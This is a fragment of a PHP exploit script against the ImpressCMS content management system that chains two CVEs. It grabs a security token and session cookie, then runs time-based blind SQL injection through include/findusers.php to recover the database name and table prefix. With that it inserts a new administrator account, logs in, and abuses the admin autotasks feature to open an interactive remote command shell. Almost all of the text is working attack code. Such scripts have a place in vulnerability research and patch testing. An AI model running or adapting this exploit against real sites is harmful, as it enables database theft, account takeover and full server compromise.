"; print "\nExample: php $argv[0] http://localhost/impresscms/"; print "\nExample: php $argv[0] https://www.impresscms.org/\n\n"; die(); } $url = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080"); print "\n[+] Retrieving security token (CVE-2021-26598)\n"; curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend"); $res = curl_exec($ch); if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n"); if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n"); print "[+] Starting SQL Injection attack (CVE-2021-26599)\n"; print "[*] Step 1: retrieving database name\n"; curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]); $params = "user_submit=1&token={$token[1]}&groups[]=%s"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = hex_enc("SELECT IF(ORD(SUBSTR(DATABASE(),{$idx},1))<{$test},1,SLEEP(1))"); $sql = "0); SHOW WARNINGS; SET@q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $start = time(); curl_exec($ch); $secs = time() - $start; $min = ($secs < 2); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $dbname .= chr($chr); $min = true; $idx++; print "\r[+] DB name: {$dbname}"; } print "\n[*] Step 2: retrieving tables prefix\n"; $sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))"); $sql = "0); SHOW WARNINGS; SET@q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $start = time(); curl_exec($ch); $secs = time() - $start; $min = ($secs < 2); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $prefix .= chr($chr); $min = true; $idx++; print "\r[+] Prefix: {$prefix}"; } print "\n[*] Step 3: creating new admin user\n"; $uid = time(); $pwd = md5("egix"); $sql = hex_enc("INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, 'egix', 'egix', '{$pwd}', 5, 0)"); $sql = "0); SHOW WARNINGS; SET@q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); $sql = hex_enc("INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})"); $sql = "0); SHOW WARNINGS; SET@q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); print "[+] Trying to login as the new user\n"; curl_setopt($ch, CURLOPT_URL, "{$url}user.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login"); if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[+] Launching shell\n"; $phpcode = 'print(____); $c="%s"; $o=`$c`; print($o); print(____); '; $params = "fct=autotasks&sat_name=rce%d&sat_code=%s&sat_enabled=1&sat_repeat=1&op=addautotasks"; curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); while(1) { print "\nimpresscms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $encoded = ""; for ($i = 0; $i < strlen($cmd); $i++) $encoded .= sprintf("\x%02x", ord($cmd[$i])); curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, time(), urlencode(sprintf($phpcode, $encoded)))); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }